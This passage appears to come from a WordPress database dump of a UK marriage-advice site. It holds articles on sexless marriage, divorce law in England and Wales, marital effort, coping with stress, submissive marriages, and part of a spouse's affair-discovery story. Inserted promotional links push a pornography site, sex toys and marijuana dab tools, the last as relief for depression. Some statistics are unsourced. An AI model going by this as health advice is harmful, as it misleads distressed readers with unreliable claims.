href=\"https://foxyplugs.com/blogs/news/dangers-risks-of-tail-butt-plugs\">be careful with these</a>, getting toys without understanding how to use them or the risks behind them could cause more harm than good if something goes wrong. There can be a lot of pleasure and intimacy to be shared between couples who open up their sexual desires and wants... if you <a href=\"https://lustplugs.com/blogs/info/how-painful-are-penis-plugs\">insert carefully</a> of course. </p>\r\n<h3><em><strong>Third Dumb Thing to Do</strong></em></h3>\r\n<p>It\'s dumb to not consider all the physical problems that could be getting in the way. Think of an ordinary garden hose for a moment. If you pick up the end of the hose and point it at some flowers in the garden, and squeeze the nozzle while pointing... and nothing comes out, what do you do? You don\'t stand there pointing and squeezing all day, do you? You don\'t put the nozzle down and come back to it day after day, week after week, pointing and squeezing to no avail, do you? No, you adapt!</p>\r\n<p>You turn around and check to see if you have taken the time to turn the water on, and then you check to see if you have a kink in the hose, and then you check to see if the nozzle is working properly – that\'s what you do. If you want to be turned on and to enjoy something a little kinky you must consider the physical problems that either of you might be having. If it isn\'t flowing, it is dumb not to consider the physical problems that might be in the way.</p>\r\n<p>I want to also include in here the issue of technique. Let me make this one summary statement:</p>\r\n<ul><li>Since 40% of women don\'t have an orgasm through intercourse</li>\r\n<li>And 75% of men ejaculate within 2 minutes of initiating intercourse</li>\r\n<li>And after 21 minutes of good clitoral stimulation 92% of women have an orgasm consistently</li>\r\n<li>Then men and women need to learn how to have great \"Outercourse\" rather than intercourse, by which I mean the focus should be on the Vulva not the vagina, and the primary sexual tools should be tongue, fingers, and hands... as well as heart and mind.</li>\r\n</ul><p>It is dumb to not understand the physiology of sexual pleasure, to use the wrong tools for the job.</p>\r\n<h3><em><strong>Fourth Dumb Thing to Do</strong></em></h3>\r\n<p>If your relationship is in trouble, your sexuality might be a casualty. It is very hard to make love with someone you don\'t get along with, or like.</p>\r\n<ul><li>If your transactions drop below a 3-to-5 ratio, good-to-bad, then your relationship is really in trouble.</li>\r\n<li>If your self-esteem is not enhanced by your relationship then you are in trouble.</li>\r\n<li>If your sense of belonging isn\'t enhance... not a good sign.</li>\r\n<li>If you don\'t feel loved</li>\r\n<li>Or if you feel like a failure with your partner in one way or another</li>\r\n<li>Or if you are bored to tears with each other</li>\r\n<li>Or if you feel controlled and dominated by your partner, or if your partner feels controlled and dominated by you...</li>\r\n</ul><p>It all can result in a loss of sexual desire. It is dumb to make love with someone you don\'t like, and it is dumb to avoid the issues behind your loss of sexual desire.</p>\r\n<h3><em><strong>Fifth Dumb Thing to Do</strong></em></h3>\r\n<p>Guilt and shame kill libido, and guilt and shame are used by tribes to keep them members in line. Your culture might have helped you to get stuck.</p>\r\n<p>It is dumb to not confront and get beyond the guilt and shame that your culture has placed on sexuality, sensuality, and sexual behavior in general. If you are limited because of the messages that you have received about sex being \"dirty,\" or the messages you have received about being \"manly\" or \"womanly\"... or whatever... then confront the facts, uncover the truth, and give it all your own meaning. It is all natural. Maybe it is more natural for some people than for others, but it is all natural as long as it doesn\'t do violence to anyone.</p>\r\n<p>It is also dumb to not write your own definitions of \"right\" and \"wrong\" when it comes to sexual behavior between the two of you. It is so very important to be able to experience novelty in your sexuality, and if you write off something as \"wrong\" then you are cutting yourself off from potential novelty. You look at what your tribe of people defines as right and wrong, and then the two of you decide for yourselves what works for you</p>\r\n<h3><em><strong>Sixth Dumb Thing to Do</strong></em></h3>\r\n<p>If you don\'t get your personal stuff lined up with great sexual pleasure, you might well be screwing yourself.</p>\r\n<p>If you have personal garbage in your life that you haven\'t been able to throw out, garbage that has caused you guilt and shame, then do something about it. It is dumb to allow that garbage to trash your self-esteem</p>\r\n<p>If you have unhealthy thoughts about sexuality then bone up on the subject at hand and get beyond the limits imposed by your mental model.</p>\r\n<p>If you are emotionally constipated when it comes to sex, then do something to free yourself up. What is the problem? Look at the list here and clarify the issues. Then, get smart, adapt, change, do something different.</p>\r\n<p>If you have a \"mental illness\" that is getting in the way, it is dumb not to figure out how to work around it... if you can.</p>\r\n<h3><em><strong>Seventh Dumb Thing to Do</strong></em></h3>\r\n<p>It is possible that there are some spiritual and/or energetic issues that are behind your sexless problems.</p>\r\n<p>In 2003 there was much talk, for the first time really, about how drained so many people are. Not enough energy to make love. Too busy, too much of the time. Here in the United States we have been seduced into chasing after all sorts of material stuff as if the acquisition of things would bring us bliss. \"Hi! How you doing? Busy?\" That has become the standard greeting. Truth is, too many of us are so busy \"making a living\" that we haven\'t the time to make love.</p>\r\n<p>The result is that many of us have unbalanced energy systems; our Chakras are out of balance and we don\'t perform at optimum levels. And some of us have souls that are disturbed – souls that are struggling to find \"center\" and to stay there. It is as if a love affair with God has taken hold of us and we are in the midst of shifting our priorities and intentions.</p>\r\n<p>At these times sex often seems like a distraction, or like something that is somehow too self-indulgent and pleasure seeking.</p>\r\n<p>Sometimes, it is \"dumb\" to chase after counterfeit Gods as if bliss can be found at Walmart or Macy\'s. Sometimes, it is dumb to slip the other way and become too ascetic in search of bliss, when all of creation was given to us for our delight.</p>\r\n<p>There are other dumb things we do, too, but that list is the one you expected when you began to read this article of advice. They include the following:</p>\r\n<ul><li>Getting frustrated and angry... demanding more sex. This always backfires.</li>\r\n<li>Purchasing penis enlargement gizmos that perpetuate the Grand Gland Illusion.</li>\r\n<li>Getting into too much masturbation, which trains your mind and body to expect immediate sexual gratification. That being said, a little masturbation here and there never hurt anyone, and looking at sites like <a href=\"https://www.fullhdxxx.com/categories/719/sexy\">https://www.fullhdxxx.com/categories/719/sexy</a> could help to fulfill your needs whenever you wish.</li>\r\n<li>Turning to an affair for mere relief.</li>\r\n<li>Buying jells, creams, secret potions... all claiming to give you \"hot sex.\"</li>\r\n<li>And finally, focusing on one area of struggle while ignoring the others!</li>\r\n</ul><p>How common it is for a man to buy Viagra (or one of the others) as if that alone will solve the whole problem. So often it only increases the problem because she still doesn\'t like him, and his selfish technique still frustrates her... but with Cialis (or one of the others) she can run into the dilemma more frequently!</p>\r\n<h2>  </h2></div>\r\n			</div>\r\n		</div>','Sexless Marriage – What Not To do','A sexless marriage is difficult to cope with and some people make mistakes that they shouldn’t such as…','publish','open','open','','sexless-marriage-what-not-to-do','','','2017-10-04 09:12:01','2017-10-04 09:12:01','',0,'http://www.bournesociety.org.uk/sexless-marriage-what-not-to-do',0,'post','',0),(37,1,'2017-10-04 09:13:29','2017-10-04 09:13:29','<div id=\"content\" class=\"hfeed\">	\r\n		\r\n		\r\n	<div class=\"post-5 post type-post status-publish format-standard hentry category-divorce tag-citizens-advice-bureau tag-divorce tag-principal-registry tag-relationship tag-wales\">\r\n	\r\n				<h1 class=\"entry-title\">A Guide to Divorce in England and Wales</h1>\r\n\r\n		<div class=\"byline-meta\"/>		\r\n				<div class=\"entry-content\">\r\n		<p>Not all marriages live happily ever after and there comes a time when divorce becomes inevitable. Many people are unsure of how to go about getting a divorce in England and Wales and this guide will give you an idea of what you have to do.<span id=\"more-5\"/></p>\r\n<h3>What steps must I take now that I have finally decided to get a divorce?</h3>\r\n<p>To get a divorce in England and Wales you must fill in a form called a ‘petition\', which you then take to any divorce county court. If you live in London, you can take it to the Principal Registry.</p>\r\n<h3>How long must I have been married before I can get a divorce?</h3>\r\n<p>To get a divorce you must have been married for more than one year.</p>\r\n<h3>What reasons do I need to get a divorce?</h3>\r\n<p>You must prove to the court that you have good <a href=\"http://www.advicenow.org.uk/advicenow-guides/family/divorce-a-survival-toolkit/grounds-for-divorce-html,679,FP.html\" target=\"_blank\">grounds for wanting a divorce</a> and they will accept at least one of the following reasons:</p>\r\n<h3>You have proof that your spouse has committed adultery and you find it intolerable to live with him/her.</h3>\r\n<p>Adultery means that your spouse has had a sexual relationship with a third party of the opposite sex. If the sexual relationship was with someone of the same sex then that is not regarded as adultery but <a href=\"http://www.justdivorce.co.uk/unreasonable-behaviour\" target=\"_blank\">unreasonable behaviour</a>. You must file for divorce within six months of discovering the adultery unless you stopped living together after discovering it.</p>\r\n<p>It will have no bearing on the court\'s decisions concerning children, assets or any other judgements which one of you committed adultery.</p>\r\n<h3>Your spouse\'s behaviour has been so unreasonable that you cannot bear to live with them any longer.</h3>\r\n<p>In the last few years, a large proportion of divorces in the UK have been granted due to ‘unreasonable behaviour\' and because these types of divorces are usually granted quite quickly, they have become a popular way for couples to get divorced.</p>\r\n<p>You must <a href=\"http://www.direct.gov.uk/en/Governmentcitizensandrights/Divorceseparationandrelationshipbreakdown/Endingamarriageorcivilpartnership/Gettingadivorce/DG_193735\" target=\"_blank\">file for divorce</a> on these grounds within six months of the incident of intolerable behaviour occurring which is quite reasonable if you think about it, after all it is not fair to use this reason for something, which may have happened a long time ago and hasn\'t happened since.</p>\r\n<h3>Your spouse deserted you at least two years ago.</h3>\r\n<p>It is sometimes difficult to prove that a spouse deliberately deserted their partner and not simply away for legitimate reasons and could not contact them.</p>\r\n<h3>You and your spouse have lived apart for at least two years and that he or she agrees to a divorce.</h3>\r\n<p>If both of you can prove that you have lived apart for at least two years and that you want an amicable divorce then one of you can file for divorce.</p>\r\n<h3>You and your spouse have lived apart continuously for at least five years.</h3>\r\n<p>If the continuous separation of five years can be proven, then consent is not necessary from the other partner.</p>\r\n<h3>Must I live in England or Wales to get a divorce here?</h3>\r\n<ul><li>You and your husband or wife, must both have your permanent homes in England or Wales when the petition is started; or</li>\r\n<li>You and your husband or wife must both be living in England or Wales when the petition is started; or</li>\r\n<li>You and your husband or wife must both have had your last home in England or Wales and one of you must still be living in either of these countries when the petition is started; or</li>\r\n<li>Your husband or wife must be living in England or Wales when the petition is started; or</li>\r\n<li>You must have been living in England or Wales for at least a year on the day the petition is started; or</li>\r\n<li>You must have your permanent home in England or Wales and have been living in either of these countries for at least six months on the day the petition is started.</li>\r\n</ul><p>You may also get a divorce in England and Wales in other specific circumstances. You should contact a solicitor, law centre or Citizens Advice Bureau if you need help deciding which statement applies to you.</p>\r\n<h3>Do I really need a divorce lawyer?</h3>\r\n<p>In simple divorce cases where both partners can come to an amicable agreement then you may not need the services of a divorce lawyer but as many divorces have complicated situations to deal with such as financial support, child custody, property etc., then it is advisable to seek the advice of a <a href=\"http://www.brookman.co.uk/legal-advice/finding-a-solicitor\" target=\"_blank\">good divorce lawyer</a> at the outset. Additionally, in situations like these, you are likely to have a number of questions. You might be  worried about how things may work out. Not to forget about the complicated situations that arise in the family due to divorces. Hence, at times like these, you might need practical help and tailor-made advice from law firms like <a href=\"https://lennonssolicitors.co.uk/\">Lennon\'s Solicitors in Buckinghamshire</a> (and similar law practitioners in/near Wales) to deal with the situation at hand.\r\n<!-- End Catalyst Footer Scripts -->  </p>\r\n			  </div>\r\n	</div>\r\n			      </div>','Divorcing in England & Wales','Not all marriages live happily ever after and there comes a time when divorce becomes inevitable. Many people are unsure of how to go about getting a divor','publish','open','open','','a-guide-to-divorce-in-england-and-wales-save-your-marriage','','','2017-10-04 10:13:21','2017-10-04 10:13:21','',0,'http://www.bournesociety.org.uk/a-guide-to-divorce-in-england-and-wales-save-your-marriage',0,'post','',0),(38,1,'2017-10-04 09:12:25','2017-10-04 09:12:25','<div id=\"content\" class=\"hfeed\">\n\n			<div class=\"post-1403 post type-post status-publish format-standard hentry category-marriage tag-communication tag-help tag-keep-your-marriage tag-make tag-marital-problems tag-marriage-advice tag-marriage-relationship tag-relationship post_box top\" id=\"post-1403\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">A Healthy, Happy Marriage Takes Work				</h1>\n				</div>\n				<div class=\"format_text entry-content\">\n<p><span class=\"drop_cap\">W</span>hile you undoubtedly learned many useful things in school, how to create a happy marital relationship probably wasn’t included. Most spouses learn about marriage through the proverbial “School of Hard Knocks.”</p>\n<p>As a student, you undergo drills to help you learn your multiplication tables, you’re tested on your mastery of geography and science, and you memorize spelling words. As you progress, you learn to write term papers and to analyze symbolism in literature.</p>\n<p>But you were probably not taught one of the most important skills you could learn: how to create, nurture, and sustain a healthy, satisfying relationship with good communication and intimacy. And, sad to say, some people never learn this skill even after multiple marriages.<span id=\"more-1403\"></span></p>\n<p>There are many misconceptions about marriage and the impact of two individuals saying “I do.” Much emphasis is devoted to planning the perfect wedding-more than is usually devoted to becoming the best partner possible. Often, the marriage is regarded as something that will fall into place with minimum effort after the ceremony.</p>\n<p>Which of the following ten points about marriage were you surprised to learn after you said “I do”?</p>\n<p>1. Creating a healthy, happy marriage takes hard work.It doesn’t just happen on its own.</p>\n<p>Numerous spouses are surprised by the amount of work it takes to keep a marriage on course. Some believe that if you really love someone, the relationship shouldn’t be work, it should just flow easily. That sounds good, but in reality all meaningful relationships require an on-going investment of time, effort, energy, and commitment.</p>\n<p>2. You don’t get to coast for very long. It seems that when things are going well, you should get to “take a break” from the relationship stuff for awhile.</p>\n<p>But if you’re not growing and evolving as individuals and as a couple, then your relationship is soon going to suffer. There’s no such thing as standing still and having everything stay the same. You’re either going forwards or you’re going backwards.</p>\n<p>3. Saying “I do” is not the end-it’s the beginning. Some spouses feel that once they are married, they don’t have to extend as much effort into being romantic or nurturing the relationship.</p>\n<p>But a marital relationship isn’t the end of the road. It’s only the beginning of your opportunity to “grow your marriage” and create a rewarding relationship with your partner.</p>\n<p>4. You’re not going to change your partner after you marry. No matter how many times this statement is written or verbalized, there are many individuals who still believe that their case will be different.</p>\n<p>Motivation to change is normally the highest before marriage when both partners want to please each other. After marriage, it’s easier to become comfortable and lose motivation to work on self-growth.</p>\n<p>Females are especially susceptible to this dynamic. Because they often are hooked by the potential that they see in their partner, they’re convinced that they can change him. This usually leads to a rude awakening after marriage.</p>\n<p>5. You can’t give what you don’t already have. You have to be happy and at peace with yourself before you can create a happy, peaceful,harmonious marriage.</p>\n<p>Marriage won’t make you happy. Only you can do that. If you’re not happy with yourself and your life when you get married, nothing will change significantly afterwards.</p>\n<p>6. Frequent emotional housekeeping is required for intimacy to thrive. It doesn’t take long for a marriage to develop serious problems when emotional debris from unresolved conflicts and issues piles up.</p>\n<p>This is why good communication is important. Couples who can’t talk about their differences and resolve conflict are at high risk for divorce. Feelings of passion, emotional intimacy, and heartfelt connection are all dependent on<br />\ngood communication.</p>\n<p>7. The words you say are important, so pick them carefully. You can’t expect the spouse you called a “witch” or “fool” at 8:00 p.m. to be thrilled at the thought of sex with you at 9:00 p.m.</p>\n<p>By the words you use in your interactions with your partner, you impact how your spouse feels about you. Harsh, unkind words fuel anger, resentment, and bitterness. Kind words build rapport, respect, and caring.</p>\n<p>The words you use to yourself and others when talking about your spouse and your marriage are also important. When you devalue someone or something verbally, it affects your feelings and perceptions. Negativity spreads like a virus.</p>\n<p>8. Just because you dislike your partner intensely at the moment doesn’t mean that you don’t love him or her. It’s normal to have mixed feelings toward your spouse at times.</p>\n<p>Sometimes your inner two-year-old will appear in your reactions-you know, the one who could stomp his feet and scream “I hate you, Mommy!” when he didn’t get his own way. There are times when spouses can’t stand each other and the feelings of closeness and connection lessen. But that doesn’t mean that the marriage is over or that the love is permanently gone.</p>\n<p>9. Success in marriage, as in life, is an inside job. The breakthroughs happen when you take responsibility for your actions and attitudes and focus on what changes you can make to improve the relationship.</p>\n<p>It’s important to learn how to stay centered and balanced emotionally as much as possible, and that requires inner work on yourself. Learning to be more self-aware will help you better understand your part in creating the present<br />\nsituation.</p>\n<p>10. There’s no end to growth. There’s always something else to experience and learn. You can always improve your relationship skills and grow more as a person.</p>\n<p>Unlike school where you eventually get a diploma if you meet the requirements, you never “graduate” from relationship school. Just when you think you’ve learned to keep your equilibrium in your relationship, something is sure to throw you off balance as if to test you. That’s why you need to keep working on your marriage at all times.</p>\n<p class=\"alert\"> </p></div>\n			</div>\n		</div>','A happy and healthy relationship takes work and committment','While you undoubtedly learned many useful things in school, how to create a happy marital relationship probably wasn\'t included. Most spouses learn about m','publish','open','open','','a-healthy-happy-marriage-takes-work','','','2017-10-04 10:14:25','2017-10-04 10:14:25','',0,'http://www.bournesociety.org.uk/a-healthy-happy-marriage-takes-work',0,'post','',0),(39,1,'2017-10-04 09:12:40','2017-10-04 09:12:40','<div id=\"content\" class=\"hfeed\">	\r\n		\r\n		\r\n	<div class=\"post-64 post type-post status-publish format-standard hentry category-self-help tag-depression tag-relationship\">\r\n	\r\n				<h1 class=\"entry-title\">A Peaceful Place In The Storm – How To Stay Calm When Life Isn\'t</h1>\r\n\r\n		<div class=\"byline-meta\"/>		\r\n				<div class=\"entry-content\">\r\n		<p>  </p>\r\n<p>No matter what is happening in the world around us, it is never necessary to become stuck in depression, fear or other negativity. We are not the victims of the world we see, but have the ability to mobilize ourselves and create a positive, life giving response. There are simple steps to take and truths to know, which when absorbed and practiced easily turn our state of mind around – and can effect the world outside as well.<span id=\"more-64\"/></p>\r\n<p>Depression and fear can easily become addictive. The longer we stay in those states of mind, the more difficult it can become to leave them. Our world grows smaller, our focus constricts, and we begin to develop catastrophic expectations which seem inevitable. In this process we lose touch with the power of our own true nature to choose, decide, renew, and to take actions which counteract the negativity that has been presented to us. In fact, it is the responsibility of every mature adult, to take the reins of his/her life back in her hands and steer it in the direction of her own choosing. This takes courage and practice, but with the tools of Centering it is easy to do. The more we do it, the stronger we grow, and the more we can see negativity for what it is, a shadow of our real selves, with no intrinsic power of its own, other than that which we give it.</p>\r\n<h3>Centering</h3>\r\n<p>The practice of Centering is ancient and has many forms and components. All exercise, martial arts and forms of meditation and prayer are ways to achieve centering and balance in the truth of who we are. They are ways of tapping into the fundamental strength and wisdom all individuals are endowed with. In Zen they say, \"Open the treasure house within.\" This reminds us that we are endowed with gifts which are far greater than we currently realize or employ. When we integrate Centering with psychological practice, we develop an entirely different way of working with the pain, confusion and difficult relationships that most individuals find themselves in. In this article, two Centering practices will be offered. While both are simple, they are very powerful. When either of them is taken on and practiced daily, changes will soon be seen.</p>\r\n<h3>Attention</h3>\r\n<p>We are what we think about. Morita, a Japanese psychiatrist, the founder of Morita Therapy, states that all neurosis comes from frozen attention that has gotten stuck and fixed upon recurring negative thoughts. In the West we call this obsession. In the world of Zen, this condition is described as being in the grip of one\'s ego, pre-occupied by self centered thoughts. The more we give attention to that which is destructive, the more strength it has to rule our lives. This can be counteracted rather easily.</p>\r\n<h3>Take back your attention.</h3>\r\n<p>Do not let it be absorbed by all that is presented to it. The power of focus is the power of life. Spend time each day developing focus and concentration. This is also called meditation. Withdraw yourself from the chaotic external world for a period of time each day, and pull your attention back within. Sit with a straight back, do not move and concentrate upon your breath. Let random thoughts come and go. Do not suppress them, but do not let them grab your attention away. (At first you may be besieged by many surprising thoughts and feelings, but if you simply notice them and then return your attention to your breathing, these will soon die down).</p>\r\n<p>Count your breath from one to ten, then all over again. Do this for at least ten to fifteen minutes without moving. By not moving we are stopping what is called the monkey mind, the mind which jumps from one thing to the next, fears, demands, grabs and sabotages our lives. It is the monkey mind which causes our sorrow and fear. But it is only a part of us, it cannot take over our lives, when we take our attention back. By doing this daily, we are strengthening new parts of ourselves which can guide and lead us in a new direction, one of meaning, and well being.</p>\r\n<p>When concentration grows, do this practice for a little longer. Soon we will not be able to be without this time in the silence. From the silence comes all kinds of treasures, including healing of our minds and hearts.</p>\r\n<p>This wonderful time spent with oneself is a simple way to attain perspective, become able to see clearly and be planted in the larger truth. We do not become so carried away by momentary problems or feel as vulnerable anymore. This time becomes a fortification against many storms which naturally besiege us. We develop a place within ourelves to which we can always return, for wisdom, strength and comfort. When we allow the external world to consume us, we are simply giving our natural treasures away.</p>\r\n<p>Centering is different than conventional models of treating psychological problems. Here we focus upon the strengths, not the weaknesses. We find the health of the individual and encourage that to grow. Little by little the illness and fear is no longer needed and drops away by itself. This model by-passes the illusions that grip us. It gives them no credence at all. Rather than struggle to analyze and undo our patterns, we work directly with our attention. The question before us always is: What am I focussing on this moment? Am I present to the breathing, or lost somewhere in a dream, dwelling upon the pains and wrongs I think have others have done me, or the terrible things that can happen someday?</p>\r\n<p>Reality continually renews and confronts us with new tasks, challenges, opportunities and solutions, day after day. Are we in touch with this ever flowing reality? Are we asking ourselves what is available now, what gifts we are receiving and what we can give to others, or are we dwelling upon how wronged, threatened or deprived we\'ve always been? By taking our attention off our toxic inner dialogue, and focusing upon what is before us, right now, we directly interfere with the habitual patterns that are the primary cause of our suffering.</p>\r\n<p>As we do this faithfully, the second step of Centering appears. At a certain moment we become aware that depression and gratitude, or the willingness to be of service, cannot co-exist in the same person at the same time. When we are totally absorbed with our own safety, security or well being, our natural life force and ability to live fulfilling lives becomes blocked When our focus and life are primarily self absorbed, revolving around self centered dreams, what we are needing and what others are thinking of us, we live in a prison without bars. Any insult, real or imagined, can become the cause of great pain, resulting in withdrawal and retreat into fantasies. Underlying feelings of worthlessness emerge, producing additional depression, hostility and stress. And this is the last thing that you want to have to deal with. When these emotions start to come into fruition though, many people decide to <a href=\"https://fatbuddhaglass.com/collections/dab-tools\">read more</a> about what they can do to help relieve these symptoms once and for all. For example, taking forms of marijuana through a dab rig may be the perfect option for some, whereas others may decide to speak to a therapist or doctor to find out their other choices. Whatever you do though, finding an effective coping mechanism for you is the most important thing to think about in these situations.</p>\r\n<p>In Centering we change our focus to all that we are receiving, what others need, what we can give, what has to be done, moment by moment, person by person. And then we do it. We take action. We do not hesitate. When our focus is put upon simple daily actions, and upon doing \"deeds of service,\" the monkey mind is dismantled and passing emotions do not take center stage.</p>\r\n<p>As we Center we learn to do each action with full attention, (no matter how small or large). We do not dwell upon the outcome. Our joy and satisfaction comes from acting with a whole heart and mind. Results and consequences are secondary, and take care of themselves. When we are not absorbed by concern for outcomes, how much anxiety can we ever have?</p>\r\n<p>The medicine Centering offers is simple and direct. It has no negative side effects and the more one takes it the sweeter it tastes. As we learn to do each task wholeheartedly, we then naturally evolve into doing \"deeds of worth\".</p>\r\n<p>The most powerful antidote to psychological suffering is an individual\'s sense of self worth. This does not come about through artificially boosting self esteem, but as a result of living a life worthy of respect. Each individual must make a personal alignment between their daily actions and their highest values. In this way, each one learns to build a life that ennobles them, and is of natural service to others as well.</p>\r\n<p>As we become more and more available to the present moment, we become occupied with that which is valuable, and life giving. Not only does our resourcefulness increase, but our responses become fitting and appropriate to whatever it is that is needed. In this manner we can best handle any difficult situation and give what is needed to all. Not only does life feel like a gift we are constantly receiving, but we become a gift to life as well.</p>\r\n<p>  </p>\r\n			  </div>\r\n	</div>\r\n			      </div>','How can you stay calm when your marriage is falling apart?','No matter what is happening in the world around us, it is never necessary to become stuck in depression, fear or other negativity. We are not the victi','publish','open','open','','a-peaceful-place-in-the-storm-how-to-stay-calm-when-life-isnt-save-your-marriage','','','2017-10-04 10:13:37','2017-10-04 10:13:37','',0,'http://www.bournesociety.org.uk/a-peaceful-place-in-the-storm-how-to-stay-calm-when-life-isnt-save-your-marriage',0,'post','',0),(40,1,'2017-10-04 09:12:57','2017-10-04 09:12:57','<div id=\"content\" class=\"hfeed\">\n\n<div id=\"fb-root\"></div>\n					<script type=\"text/javascript\"><![CDATA[\n						window.fbAsyncInit = function()\n						{\n							FB.init({appId: null, status: true, cookie: true, xfbml: true});\n						};\n						(function()\n						{\n							var e = document.createElement(\'script\'); e.async = true;\n							e.src = document.location.protocol + \'//connect.facebook.net/en_US/all.js\';\n							document.getElementById(\'fb-root\').appendChild(e);\n						}());\n					]]></script><div class=\"post-1572 post type-post status-publish format-standard hentry category-marriage tag-feelings tag-husband-slave tag-marriage tag-personality-type tag-relationships tag-submissive-relationship post_box top\" id=\"post-1572\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">A Subservient Marriage – Can It Work?				</h1>\n				</div>\n				<div class=\"format_text entry-content\">\n<div class=\"wpfblike\" style=\"height: 40px;\"><like href=\"http://saveyourmarriage.co.uk/a-subservient-marriage-can-it-work/\" layout=\"default\" show_faces=\"false\" width=\"400\" action=\"like\" colorscheme=\"light\" send=\"true\"></like></div><div class=\"twitter_button\" style=\"float: right; margin-left: 10px;\"></div>\n<div class=\"tweetmeme_button\" style=\"float: right; margin-left: 10px;\"><a class=\"tm_button\" rel=\"&amp;style=normal&amp;hashtags=Feelings,Husband+Slave,Marriage,Personality+Type,Relationships,Submissive+Relationship&amp;b=2\" href=\"../a-subservient-marriage-can-it-work/\"></a></div>\n<p>Marriages come in all shapes and sizes, and what works for one marriage can seem very strange to other married couples. In many, one partner is dominant over the other simply because that’s the way both spouses like to do things. But this has to be done by mutual understanding otherwise the marriage will be put under tremendous strain when one rides roughshod over the other ones feelings.<span id=\"more-1572\"></span></p>\n<p>In some marriages the husband might simply defer to his wife’s decisions as she might be better at running the household. This can work surprisingly well in some cases. But there’s another type of marriage where the man becomes completely submissive and essentially hands over all control to the woman. This is the type of relationship that’s referred to typically when you read about a wife led relationship.</p>\n<p>There are degrees of these married relationships, and there may be some you are more comfortable with than others. Some of these marriages will see the husband behaving as a subservient slave when at home with his wife. When in public, they appear as a normal married couple but the man will allow her to make even the most basic decisions, like what to order for dinner. </p>\n<p>Other marriages may see the husband as his own person, but allowing all major decisions to be taken by his wife. Finding the right degree of submissiveness may not be as easy as you think. And even if you want a completely submissive relationship with your wife, she may not be that comfortable with it. It all depends on her own values and personality type. Some women love to be in control, but when their husband doesn’t like to be controlled this will lead to conflict sooner or later.</p>\n<p>It can be a huge change for a man to want to be in a marriage where the wife is in full control. First of all, a subservient marriage may be one where the man is practically a slave, and that’s something your wife might not even consider even if you want it. Not only might it seem unnatural to her, but it’s probably unlike anything you’ve ever asked her to do. </p>\n<p>This type of subservient marriage means that the man does just about everything around the house, including all chores, cooking, cleaning and anything she tells you to do. Of course, she may lots of things too, but some men in this type of marriage will like to do everything. They get a strange thrill out of knowing they are being dominated and controlled like a slave. </p>\n<p>It may seem strange, but some men might even be upset to discover that she’d done a chore before they did it. This is in part, because the woman is also in complete control of their sexual relationship. In this type of marriage, the woman is expected to use sex and both punishment and reward. </p>\n<p>If she is pleased by the chores that the man has done, then offering sexual release is a reward that the man may look forward to. But if she is displeased, then he may be forced to give her pleasure while denied pleasure of his own. </p>\n<p>For some men, this is is a big turn on and they look forward to having pleasure withheld because they know that when they are allowed release it will be even better. Other men may like the idea of a woman making major decisions, but not want that type of relationship in the bedroom. </p>\n<p>If you want to try a subservient relationship, it’s important to discuss it with your wife. You may start off by doing more around the house and taking care of her almost like a slave. Ask what she thinks of it and if she’d like it to continue. That’s a good way to start the conversation about whether or not you can have this type of marriage. </p>\n<p>A subservient marriage is definitely not for everyone but if it works then that’s just the way things are meant to be. When all’s said and done, they are adults and should be capable of making decisions that suit them both, even if others find it rather unusual.</p>\n					<p class=\"post_tags\">  </p>\n				</div>\n								</div>\n		</div>','Subservient Marriage – Can It Work?','A subservient marriage is definitely not for everyone but if it works then that’s just the way things are meant to be.','publish','open','open','','subservient-marriage-can-it-work','','','2017-10-04 09:12:57','2017-10-04 09:12:57','',0,'http://www.bournesociety.org.uk/subservient-marriage-can-it-work',0,'post','',0),(41,1,'2017-10-04 09:14:46','2017-10-04 09:14:46','<div id=\"content\" class=\"hfeed\">\n\n			<div class=\"post-45 post type-post status-publish format-standard hentry category-affairs tag-affair tag-chat-rooms tag-cheating tag-cheating-husband tag-cheating-wife tag-elaine-lemons tag-emotional-affair tag-help tag-how-to-survive-an-affair tag-make tag-online-infidelity tag-preferred-customers tag-relationship tag-voice-memos post_box top\" id=\"post-45\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Are mobile phones To Blame for Marital Misconduct?				</h1>\n				</div>\n				<div class=\"format_text entry-content\">\n				  <p>Remember that day so long ago when you said, “I do”. There was no doubt in your mind at that very moment that you were in for the long haul and never thought about anything else.</p>\n<p>You acknowledged your vows with the truest of intentions and with your whole heart. I’m sure you I soon discovered married life is tough and that can contribute to problems in the best of marriages. Two people can love each other so much and still lose their way.</p>\n<p>My marriage wasn’t perfect but there was nothing going on to make me think it was falling apart, at least I didn’t think so at the time. My husband and I had been through a lot like every other couple and I felt comfortable in our relationship.</p>\n<p>We argued, made-up and went on with life. One night we were in Walmart and as usual we parted ways to do our shopping. He had his cell phone and I had mine so that we could call each other when we were done.</p>\n<p>As I was strolling along I saw my husband standing at the end of an aisle on his cell phone. He was laughing and appeared to be somewhat blushing. I instantly called his cell phone and asked if he was about done. He replied he was and that he would meet me at the registers in a bit. I hung up and watched as he dialed a number and resumed his conversation.</p>\n<p>I had a very uneasy feeling but I didn’t know what to think. I felt like a stalker that night hiding behind clothes racks and shelves spying on him.</p>\n<p>Later that night while we were having dinner I asked him if ‘we’ were okay and he assured me we were. I still didn’t feel quite right so I just asked that dreaded question, “Are you cheating on me?” It’s not what he said that pierced my heart it was his nervous fidgeting while denying the accusation.</p>\n<p>An eighteen-wheeler couldn’t have smacked me as hard as reality did at that very moment. I was angry, shocked and very hurt. My life went from comfortable and somewhat organized to a complete void.</p>\n<p>I felt like I had hit bottom in the darkest of tunnels without even taking the ride. But wait! I’ve been married over a decade. I had taken a ride, but I guess I missed all of the road signs that told me I was heading for the end.</p>\n<p>I could have taken my husband’s word that we were fine, but my gut instinct told me different. The very thought of living a lie and those little voices in my head began eating away at me. I had to know the truth.</p>\n<p>I began with his cell phone bill. We didn’t receive itemized bills in the mail and I never really thought about it. I just assumed we were saving a buck or two every month, but I soon discovered that I could view his cell phone bill online since we had a joint account. It wasn’t difficult to set up and I was able to view previous bills.</p>\n<p>I printed out every bill I could and highlighted frequently called numbers. I then visited a few web sites that offered free reverse phone number searches and started putting names to the numbers. I couldn’t do that with cell phone numbers so I stooped to the level of “Mrs. Anonymous”.</p>\n<p>I called several of his friends and co-workers blocking my home phone number while trying to disguise my voice with a low, “I’m sorry. I’ve got the wrong number”. At first I felt rotten but with each new discovery it added fuel to my own little investigation. Soon I was playing the part like a pro.</p>\n<p>I was making anonymous phone calls, jotting down notes, and crying my eyes out at the same time. I eventually found the other woman’s home phone number and her cell phone number.</p>\n<p>His cell phone bill also showed an extremely heavy volume of text messages, which I could not check. All I knew was the number sent and received. I called our cell phone service provider and was told that text messages could not 